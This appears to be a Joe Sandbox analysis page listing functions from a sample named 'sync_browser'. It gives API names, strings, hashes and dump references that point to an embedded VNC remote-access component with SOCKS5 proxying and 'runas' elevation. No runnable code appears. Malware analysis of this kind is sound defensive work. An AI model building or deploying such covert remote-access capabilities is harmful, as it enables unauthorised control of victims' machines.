                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
                                                                    • String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
                                                                    • API String ID: 3271485511-23260621
                                                                    • Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                    • Instruction ID: cde27cce1626de4249fb842a8a9fc5c8f7e533d02a52f1171b286b26743dc336
                                                                    • Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                    • Instruction Fuzzy Hash: 78219C726185DA85EB008FB5C8107EC2765EB98B08F484437CE4CCA6A9DE7CE1A7C331
                                                                    Function 00007FF6DC0D3E20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                    • String ID: -softwarecad$p$runas
                                                                    • API String ID: 397093096-2208381721
                                                                    • Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                    • Instruction ID: b4198d1bb480ffb3d0290b10e1700d8863a49bb21ef67f7434a55f5dc0ec22eb
                                                                    • Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                    • Instruction Fuzzy Hash: 6D11BA35518B95C5E7709B50F89939EB3A8FB88744F800236D69D42B94DF7CD16ACB00
                                                                    Function 00007FF6DC1876E8 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                                    • String ID:
                                                                    • API String ID: 113790786-0
                                                                    • Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                                    • Instruction ID: 1fbae02904d94ade5958b7420fdc933bb1a428092d63d238a862eefa40246981
                                                                    • Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                                    • Instruction Fuzzy Hash: F9216D21E1D62A91FA51AB50EC08B7E629CAF41780F544537F50EC76C1CF3CE462EB90
                                                                    Function 00007FF6DC189A94 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 240COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF6DC1837C4: GetLastError.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC1837CE
                                                                      • Part of subcall function 00007FF6DC1837C4: FlsGetValue.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC1837DC
                                                                      • Part of subcall function 00007FF6DC1837C4: FlsSetValue.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC183808
                                                                      • Part of subcall function 00007FF6DC1837C4: GetCurrentThreadId.KERNEL32 ref: 00007FF6DC18381C
                                                                      • Part of subcall function 00007FF6DC1837C4: SetLastError.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC183834
                                                                      • Part of subcall function 00007FF6DC1832EC: Sleep.KERNEL32(?,?,?,00007FF6DC1837F7,?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19), ref: 00007FF6DC183331
                                                                    • _errno.LIBCMT ref: 00007FF6DC189D9C
                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC189DA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
                                                                    • String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
                                                                    • API String ID: 1962487656-880385205
                                                                    • Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                    • Instruction ID: 2bb1f59e6f0ec21480e31c9059a675370b9af92738399169bd6b1dd4a2126de2
                                                                    • Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                    • Instruction Fuzzy Hash: F891F5336081958BEB098A38C894BAC3FE6DB61705F08C136DA48CB796DE3DE51BC741
                                                                    Function 00007FF6DC0CC0C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 201networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
                                                                    • String ID: SOCKS5_AUTH
                                                                    • API String ID: 788663964-1698957378
                                                                    • Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                    • Instruction ID: ee9c156e07fe44ead0339a145f14e613118399a2c969c02bcddf4a38cdf57570
                                                                    • Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                    • Instruction Fuzzy Hash: C481062261C64680EB618729EA406BE6691EFC5794F441233ED5EC7AC9EF2DD426C710
                                                                    Function 00007FF6DC0CCDC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
                                                                    • String ID: 0123456789.
                                                                    • API String ID: 1515065793-2088042752
                                                                    • Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                    • Instruction ID: 32b9271dbbeb440523524044c2f7d8fb5865439200f19c751007a8132764cf38
                                                                    • Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                    • Instruction Fuzzy Hash: 0B416571A046998AEF309F21DD442FD2290EF88BA9F044236D92D877D5EF3DE5678710
                                                                    Function 00007FF6DC0DE320 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$InitializeLeave$EnterExceptionRaisemalloc
                                                                    • String ID: P$vncclient.cpp : init update thread
                                                                    • API String ID: 1414418286-2218817233
                                                                    • Opcode ID: a2ddf4542d68b33c97d8dd45c1d4527320b6cb60f175d7e18664f7ad04aba2c8
                                                                    • Instruction ID: 29862da80fc6c96ac115dc12aa92f2aae624ade5b7c76af6800215169e767a3a
                                                                    • Opcode Fuzzy Hash: a2ddf4542d68b33c97d8dd45c1d4527320b6cb60f175d7e18664f7ad04aba2c8
                                                                    • Instruction Fuzzy Hash: 4A417432619B9586E7548F21E9443ADB3A4FB84B90F044136DB9D83B94DF3CE476C700
                                                                    Function 00007FF6DC0D77C0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 88sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterInitializeLeaveSleep
                                                                    • String ID: keyEvent$start_event$stop_event
                                                                    • API String ID: 2894921085-1979648887
                                                                    • Opcode ID: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                    • Instruction ID: 2522bcc55f9047550e4f6eaa720b44a282b8fda73fad17b8fd279890f740e4b0
                                                                    • Opcode Fuzzy Hash: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                    • Instruction Fuzzy Hash: B0417920E2DB5B82FA119B18E95077C2390AFD8754F400136D94EC7BA6CF7EA4A7CB41
                                                                    Function 00007FF6DC116FF0 Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
                                                                    • String ID:
                                                                    • API String ID: 3112530957-0
                                                                    • Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                    • Instruction ID: dc6bd0cf9a5291e367092d5d4bd92620417b037e55692f61bc9c1c95192efece
                                                                    • Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                    • Instruction Fuzzy Hash: F441F7769086C58AE324DF38E8447ADBBA4F748B18F044936EA6D97748DF3CD5058F10
                                                                    Function 00007FF6DC113740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF6DC177BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF6DC113771), ref: 00007FF6DC177BFE
                                                                    • GetLastError.KERNEL32 ref: 00007FF6DC113790
                                                                    • SetLastError.KERNEL32 ref: 00007FF6DC1137B2
                                                                    • FormatMessageA.KERNEL32 ref: 00007FF6DC1137EB
                                                                    • sprintf.LIBCMT ref: 00007FF6DC113804
                                                                      • Part of subcall function 00007FF6DC17B240: _errno.LIBCMT ref: 00007FF6DC17B258
                                                                      • Part of subcall function 00007FF6DC17B240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC17B263
                                                                      • Part of subcall function 00007FF6DC113690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF6DC11385F), ref: 00007FF6DC1136A9
                                                                      • Part of subcall function 00007FF6DC113690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF6DC11385F), ref: 00007FF6DC1136D1
                                                                      • Part of subcall function 00007FF6DC113690: WriteConsoleA.KERNEL32 ref: 00007FF6DC1136EE
                                                                      • Part of subcall function 00007FF6DC113690: WriteFile.KERNEL32(?,?,?,?,?,00007FF6DC11385F), ref: 00007FF6DC113725
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
                                                                    • String ID: --$error code 0x%08X
                                                                    • API String ID: 1897734068-3878996968
                                                                    • Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                    • Instruction ID: b7174e87be2a4003c12027297e1800d5a248a807898d803b1909d2b57bec3c45
                                                                    • Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                    • Instruction Fuzzy Hash: A631C672B08A9581EB20DB25E8143AE6764FB85BA4F544336EB6D876C9DF3CD4278700
                                                                    Function 00007FF6DC17D58C Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __doserrno_errno
                                                                    • String ID:
                                                                    • API String ID: 921712934-0
                                                                    • Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                    • Instruction ID: c0ca22f6200d0e65edc1a397300e78782fa7f954e9b64864c12ac6dd93108fe0
                                                                    • Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                    • Instruction Fuzzy Hash: 05210E22E1866E86E6117F24DC4137E26186F81B60F490233FA1C873D2CE7CA863E720
                                                                    Function 00007FF6DC0D7220 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileModuleNameShellfclose
                                                                    • String ID: \uvnckeyboardhelper.exe$p$runas
                                                                    • API String ID: 3322125093-2954907143
                                                                    • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                    • Instruction ID: 8c50e03d9035e9dca1009052d93e5e42bd165f69c576c632c3ddfe6dc1f231b3
                                                                    • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                    • Instruction Fuzzy Hash: 0D311E31A0CB9685EB659B10F8513AE73A8FB88754F404237DA9D83B95DF3CE126CB00
